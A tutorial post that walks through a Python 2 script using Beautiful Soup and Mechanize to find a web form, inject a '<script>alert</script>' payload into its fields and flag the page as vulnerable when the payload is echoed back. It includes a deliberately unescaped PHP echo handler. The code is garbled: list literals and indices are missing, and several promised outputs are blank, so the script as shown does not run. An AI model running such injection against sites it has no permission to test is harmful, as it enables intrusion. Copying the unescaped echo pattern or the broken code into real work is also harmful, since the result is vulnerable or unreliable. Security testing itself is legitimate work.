Automate Cross Site Scripting (XSS) attack using Beautiful Soup and Mechanize
Python can be used to develop a small customized application to automate cross site scripting attack, it can be very useful if you are performing a penetration test and need to automate few tasks. We will be using two python libraries Beautiful Soup and Mechanize to parse the website document and than submit forms using Mechanize.
Step 1: Install Mechanize an Beautiful Soup
Our first step would be to install these two python libraries, if you already have them skip to step two. Following commands could be used to install them both.
pip install mechanize pip install beautifulsoup4
You can now use both these libraries in your python code.
Step 2: Extract the form name using Beautifull Soap
Beautiful soup is such an amazing library that can be used to parse, manipulate and do many other tasks, all you need to know is a URL to get data from. We will use this module to download the source code of a web page we are going to perform penetration test against.
As we are automating the task, so we will need to find forms inside the web page and enumerate the form fields. So that we can than send data to those form fields and records the responses. Let see how we can do that.
Note : In this tutorial we assume that there is only 1 form present on the web page. Later we will see how we can do the same task if multiple forms are present on the page. We will also be using the request module, if you are interested you can read about it in the previous article at :
import requests from bs4 import BeautifulSoup request = requests.get("http://check.cyberpersons.com/crossSiteCheck.html") parseHTML = BeautifulSoup(request.text, 'html.parser') htmlForm = parseHTML.form formName = htmlForm['name'] print "Form name: " + formName
Lets discuss this code line by line
- First two lines are just the simple imports.
- Sending a get request to the selected URL. (response.text contains the HTML document we just got from the URL)
- On the third line, we’ve our complete HTML documented represented by the object ‘parseHTML’. It contains all our HTML code (tags, attributes, etc)
- As we are currently only interested in the form name, so we’ve assigned the form tag to variable ‘htmlForm’.
- Usually html form name is stored in the ‘name’ attribute, we can get the attribute values in Beautiful soap using the code on line five, ‘name’ can be replaced with the any present attribute.
- Finally printing the form name.
We’ve used following web document in this example, and the form name is ‘myForm’
<html> <body> <form name="myForm" action="vulnerable.php" method="post"> Name: <input type="text" name="name"><br> E-mail: <input type="text" name="email"><br> <input type="submit" value="Submit"> </form> </body> </html>
Corresponding PHP code:
<html> <body> Welcome <?php echo $_POST["name"]; ?><br> Your email address is: <?php echo $_POST["email"]; ?> </body> </html>
So our python output is:
Step 3: Extract Input Field Names
Mechanize need form name and input field names before it can actually submit the form, we already have the form name, but we need input fields present in the form. We can use the code below to extract field names from the web document:
inputs = htmlForm.find_all('input') inputFieldNames =  for items in inputs: if items.has_attr('name'): inputFieldNames.append(items['name']) print inputFieldNames
- First we need to store and find all input tags present on the page, we did that using the code on first line, now ‘inputs’ object contains all the input fields.
- Now for loop will extract value of attribute ‘name’ from those input tags and store them in the list called ‘inputFieldNames’
After running this code your output should be:
Step 4: Open page using Mechanize and select Form
Its time we should open page using Mechanize, because we’ve pieced together everything we need to submit form. Let see how we can open a web page using Mechanize and select a form.
import mechanize formSubmit = mechanize.Browser() formSubmit.open("http://check.cyberpersons.com/crossSiteCheck.html") formSubmit.select_form(formName)
- Just imporing the mechanize module.
- Before opening a url through mechanize, we need to first instantiate a browser, and we just did that on line two of this code.
- Than we opened the same url.
- As you know from above that our form name is stored in variable called ‘formName’, so we’ve passed this variable to ‘select_form’ function, mechanize have now selected our desired form for submission.
Before submitting our form, we need to build the data to be submitted.
Step 5: Prepare form input data
As we already know from above that this form have only two input fields, we can just populate them so that we can submit our form. The code below will do the trick:
payLoad = '<script>alert("vulnerable");</script>' formSubmit.form[inputFieldNames] = payLoad formSubmit.form[inputFieldNames] = "usman[@]cyberpersons.com"
- First line is the cross site scripting payload creation, that we will send on the form field ‘Name’
- Later two lines just set the values for form fields of the html document (Name, Email)
Just as a reminder,
inputFieldNames contains ‘name’
inputFieldNames contains ’email’
Step 6: Submit form and read response
Its time we should do what we are anxiously waiting for, lets submit the form and read response.
formSubmit.submit() print formSubmit.response().read()
This piece of code here will submit your form, just like you submit from the browser and print the data, I’ve had the following printed:
As an human you know that this web application is not filtering any kind of input data, and printing back what is actually submitted to the input fields. If you submit the same request from the browser your output will be :
That means web application is vulnerable to cross site scripting attack.
Step 7: Vulnerable or not!
You know that this application is vulnerable but computer don’t. So, if you are checking for multiple urls there must be a way to tell if the site is vulnerable to our payload or not. We can easily achieve that, let see how:
finalResult = formSubmit.response().read() if finalResult.find('<script>')>=0: print "Application is vulnerable" else: print "You are in good hands"
We can store our response after form submission in a variable called ‘finalResult’, and use ‘find’ function to match a substring from our payload. Our payload contains the string ‘<script>’, so if response contains this string means we are vulnerable and not otherwise. Output now will be :
Step 8: Automating the preparation of input data
In step 5 we’ve hard coded the input data, but we can also automate this step. If you remember from above that ‘inputFieldNames’ is a list of names. So using this list we can write this code below :
payLoad = '<script>alert("vulnerable");</script>' # First field is always the payload, you can select anyfield for payload # But that don't edit it later. formSubmit.form[inputFieldNames] = payLoad for i in range(1,len(inputFieldNames)): formSubmit.form[inputFieldNames[i]] = "Customized text"
This code speaks for it self.
- Again we prepared our payload.
- Our first form input field should be filled with payload.
- Now using for loop we can fill rest of the fields with any customized text of choice.
This will now handle as many input fields present in the form, final code looks something like:
import requests from bs4 import BeautifulSoup from bs4 import BeautifulSoup request = requests.get("http://check.cyberpersons.com/crossSiteCheck.html") parseHTML = BeautifulSoup(request.text, 'html.parser') htmlForm = parseHTML.form formName = htmlForm['name'] print "Form name: " + formName inputs = htmlForm.find_all('input') inputFieldNames =  for items in inputs: if items.has_attr('name'): inputFieldNames.append(items['name']) print inputFieldNames import mechanize formSubmit = mechanize.Browser() formSubmit.open("http://check.cyberpersons.com/crossSiteCheck.html") formSubmit.select_form(formName) payLoad = '<script>alert("vulnerable");</script>' # First field is always the payload, you can select anyfield for payload # But that don't edit it later. formSubmit.form[inputFieldNames] = payLoad for i in range(1,len(inputFieldNames)): formSubmit.form[inputFieldNames[i]] = "Customized text" formSubmit.submit() finalResult = formSubmit.response().read() if finalResult.find('<script>')>=0: print "Application is vulnerable" else: print "You are in good hands"